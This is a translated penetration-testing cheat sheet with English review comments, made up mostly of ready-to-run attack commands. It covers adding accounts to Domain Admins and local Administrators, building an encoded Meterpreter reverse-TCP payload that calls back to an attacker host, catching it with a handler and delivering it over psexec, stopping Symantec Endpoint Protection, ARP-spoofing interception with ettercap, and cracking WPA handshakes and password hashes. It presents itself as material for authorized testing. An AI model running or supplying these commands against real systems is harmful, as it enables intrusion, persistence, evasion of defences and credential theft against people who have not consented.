[译]Thanks [原文]AverageSecurityGuy
这里整理了许多渗透测试中实用的 TIPS，希望对您有用。PS. 仅用于安全渗透测试及学习，禁止非法使用。
# Mount Windows Share with Null Session
# An empty password ("") and an empty user (/u:) make this an anonymous (null-session) connection;
# current Windows versions typically reject anonymous access to shares unless explicitly allowed — confirm on the target.
net use x: \\server\share "" /u:
# Mount NFS share on Linux
# server:/share and /mnt/point are placeholders; the mount point must already exist.
mount -t nfs server:/share /mnt/point
# WINDOWS: Add domain user and put them in Domain Admins group
# Both commands need domain-admin rights; account creation and privileged-group membership
# changes are high-signal audit events on a domain controller.
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN
# WINDOWS: Add local user and put them in the local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD
# LINUX: Add a new user to linux and put them in the wheel group
# NOTE(review): whether wheel grants sudo/su rights depends on the distribution's sudoers/PAM
# configuration — confirm on the target. useradd may not create a home directory without -m.
useradd -G wheel username
# LINUX: Set the new user's password
passwd username
# LINUX: If the shell is non-interactive set the password using chpasswd
# The password is placed on the command line here, so it can end up in shell history or logs.
echo "username:newpass"|chpasswd
# If you get this error while trying to drop to a shell
# in meterpreter, try the command below. This is a known bug
# in meterpreter.
# NOTE(review): the error message this tip refers to is not reproduced on this page.
# -f names the program, -c channelizes its I/O, -i interacts with it, -H hides the window.
execute -f cmd.exe -c -i -H
# Generate an executable
# NOTE(review): msfpayload and msfencode were deprecated in later Metasploit releases in favour of
# msfvenom — confirm against your install. -c 5 runs the encoder for five passes.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4445 R | msfencode -t exe -e x86/shikata_ga_nai -c 5 > custom.exe
# Setup multi/handler
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(handler) > set LPORT 4445
LPORT => 4445
# NOTE(review): the transcript omits the command that starts the handler; the two status lines
# below are the handler's output once it is running.
[*] Started reverse handler on 192.168.0.1:4445
[*] Starting the payload handler...
# In another msfconsole setup psexec
# Credentials and the executable built above are supplied as module options (SMBUser, SMBPass, EXE::Custom).
# psexec-style execution typically installs and starts a service on the target; service-install
# events are a common detection point — verify against your own telemetry.
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
msf exploit(psexec) > set SMBUser user
SMBUser => user
msf exploit(psexec) > set SMBPass pass
SMBPass => pass
msf exploit(psexec) > set EXE::Custom /path/to/custom.exe
EXE::Custom => /path/to/custom.exe
msf exploit(psexec) > exploit
# If everything works then you should see a meterpreter
# session open in multi/handler
# Disable Symantec Endpoint Protection
# NOTE(review): the path is unquoted although it contains spaces; cmd.exe normally needs such a
# path quoted — confirm before relying on this line as written.
# Stopping the client needs local administrator rights and may prompt for a client password when
# the SEP policy requires one — confirm.
c:\program files\symantec\symantec endpoint protection\smc -stop
# ARP-based man-in-the-middle with ettercap: -M arp selects the MITM method, -T the text UI,
# -q quiet output, -i the capture interface, -w writes captured traffic to a pcap.
# interface, /spoof_ip/, /target_ips/ and output_file.pcap are placeholders.
# Mitigation/detection on the network side: dynamic ARP inspection on switches or an ARP
# monitor such as arpwatch flags the spoofed mappings.
ettercap -M arp -T -q -i interface /spoof_ip/ /target_ips/ -w output_file.pcap
# (The same command appears twice on the source page.)
ettercap -M arp -T -q -i interface /spoof_ip/ /target_ips/ -w output_file.pcap
# Crack a WPA handshake capture by piping candidate passwords into aircrack-ng:
# -a 2 selects WPA-PSK mode, -w - reads the wordlist from stdin, --bssid is the target AP
# (00-00-00-00-00-00 and capture_file.cap are placeholders).
# With John the Ripper
john --incremental:all --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w - capture_file.cap
# With Hashcat
# NOTE(review): hashcat-cli32.bin is the legacy CPU-only hashcat binary; current releases ship a
# single hashcat executable — confirm for your install. rules/d3ad0ne.rule is the rule file applied
# to the wordlist before the candidates are written to stdout.
./hashcat-cli32.bin wordlist -r rules/d3ad0ne.rule --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w - capture_file.cap
# Enumerate the targets nmap would scan (-sL lists only, sends no probes; -n skips reverse DNS)
# and save just the addresses. nmap prints one "Nmap scan report for <ip>" line per host, and
# the address is the fifth whitespace-separated field of that line.
nmap -sL -n 192.168.1.1-100,102-254 \
  | awk '/report for/ { print $5 }' > ip_list_192.168.1.txt
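#!/usr/bin/env bash
# Run John the Ripper once per KoreLogic ruleset defined in john.conf.
#
# Usage: run_korelogic_rules.sh WORDLIST PASSWORD_FILE
#   WORDLIST      - wordlist handed to john via -w:
#   PASSWORD_FILE - hash file handed to john as its last argument
#
# Like the original one-liner this expects john.conf and ./john in the current directory.
# The original used backticks, unquoted expansions and literal "<wordlist>" / "<password_file>"
# placeholders, which bash parses as redirections; the two paths are now positional arguments
# and every expansion is quoted.
set -u

wordlist=${1:?usage: ${0##*/} WORDLIST PASSWORD_FILE}
password_file=${2:?usage: ${0##*/} WORDLIST PASSWORD_FILE}

# Section headers look like "[List.Rules:KoreLogicRulesFoo]"; the two cuts keep only the
# name between ':' and ']' — the same extraction the original pipeline performed.
grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1 |
  while IFS= read -r ruleset; do
    # No set -e here on purpose: one failing run does not stop the remaining rulesets,
    # matching the original ';'-terminated loop body.
    ./john --rules:"$ruleset" -w:"$wordlist" "$password_file"
  done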